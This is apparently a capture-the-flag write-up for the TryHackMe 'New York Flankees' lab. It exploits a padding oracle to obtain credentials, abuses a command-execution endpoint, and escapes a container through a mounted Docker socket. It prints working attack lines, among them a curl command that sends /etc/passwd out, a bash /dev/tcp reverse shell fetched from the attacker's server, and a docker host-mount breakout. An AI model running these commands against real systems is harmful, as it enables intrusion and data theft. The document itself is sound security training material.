# New York Flankees

Enumerating with `nmap`, we discover SSH on port 22 and HTTP on 8080.

## HTTP 8080
In the `index.html` page source, we find a script that expects a `loggedin` cookie to change the _Admin Login_ button (`login.html`) into a _DEBUG_ button leading to `exec.html`, however this page remains empty for now...

### Padding oracle endpoint
On the `debug.html` page, we are hinted towards a padding oracle (_"verbose error related to padding"_) and find the following script in the source:
```js
    function stefanTest1002() {
        var xhr = new XMLHttpRequest();
        var url = "http://localhost/api/debug";
        // Submit the AES/CBC/PKCS payload to get an auth token
        // TODO: Finish logic to return token
        xhr.open("GET", url + "/39353661353931393932373334633638EA0DCC6E567F96414433DDF5DC29CDD5E418961C0504891F0DED96BA57BE8FCFF2642D7637186446142B2C95BCDEDCCB6D8D29BE4427F26D6C1B48471F810EF4", true);

        xhr.onreadystatechange = function () {
            if (xhr.readyState === 4 && xhr.status === 200) {
                console.log("Response: ", xhr.responseText);
            } else {
                console.error("Failed to send request.");
            }
        };
        xhr.send();
    }
```
There indeed seems to be a CBC padding oracle at the endpoint:
```
/api/debug/39353661353931393932373334633638EA0DCC6E567F96414433DDF5DC29CDD5E418961C0504891F0DED96BA57BE8FCFF2642D7637186446142B2C95BCDEDCCB6D8D29BE4427F26D6C1B48471F810EF4
```
We write [a script to attack the oracle](./attack_oracle.py) and decrypt (and unpad) the token (**decrypted blob** for THM):
```
stefan1197:**REDACTED**
```
These are credentials that can be used to login and get the **1st flag** in the admin panel.

### Shell commands endpoint
Now we have a functioning access to `exec.html` and to the underlying GET endpoint `/api/admin/exec?cmd=`. This time we seem to have a shell commands "oracle" (answering `OK` when a command succeeds). We do not manage to inject a working reverse shell, however we quickly notice we can exfiltrate a file with `curl`: `curl --data-binary @/etc/passwd http://**.*.*.***:8765`.
```
$ nc -l 8765
POST / HTTP/1.1
Host: **.*.*.***:8765
User-Agent: curl/7.74.0
Accept: */*
Content-Length: 1229
Content-Type: application/x-www-form-urlencoded

root:x:0:0:root:/root:/bin/bash
...
```
But we do not seem to be able to use any kind of redirections, nor to write a file... Alternatively, we can set up an HTTP file server on our local machine and download a script (for instance a reverse shell) on the target using `curl`.

Create a script `rev.sh` and host it locally:
```
$ echo '/bin/bash -i >& /dev/tcp/**.*.*.***/8765 0>&1' > rev.sh
$ python3 -m http.server 8000
```
Then run these commands on the admin panel:
* `curl -o /tmp/rev.sh http://**.*.*.***:8000/rev.sh` (download it)
* `bash /tmp/rev.sh` (run it)

To get a reverse shell (and upgrade to a TTY) as `root` on the target machine:
```
$ nc -l 8765
root@02e849f307cc:/# id
uid=0(root) gid=0(root) groups=0(root)
root@02e849f307cc:/# python3 -c 'import pty; pty.spawn("/bin/bash")'
root@02e849f307cc:/# ^Z
$ stty raw -echo; fg
```

## Container escape
Searching around, we quickly notice we are into a container and find the **2nd flag** in the configuration files:
```
@02e849f307cc:/# rgrep 'THM{' * 2>/dev/null
app/docker-compose.yml:      - CTF_DOCKER_FLAG=THM{**REDACTED*2nd*FLAG**}
app/docker-compose.yml:      - CTF_ADMIN_PANEL_FLAG=THM{**REDACTED*1st*FLAG**}
...
```
In that `/app/docker-compose.yml` file, we also notice that the Docker socket is explicitly mounted into the container:
```
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
```
Which allows this [well-known container breakout technique](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation#mounted-docker-socket-escape) leading to the **final flag**:
```
root@02e849f307cc:/app# docker images
REPOSITORY               TAG       IMAGE ID       CREATED        SIZE
padding-oracle-app_web   latest    cd6261dd9dda   5 months ago   1.01GB
<none>                   <none>    4187efabd0a5   5 months ago   704MB
gradle                   7-jdk11   d5954e1d9fa4   5 months ago   687MB
openjdk                  11        47a932d998b7   2 years ago    654MB
root@02e849f307cc:/app# docker run -it -v /:/host/ openjdk:11 chroot /host/ bash
root@0fd1149103b6:/# cat flag.txt
THM{**REDACTED*3rd*FLAG**}
```
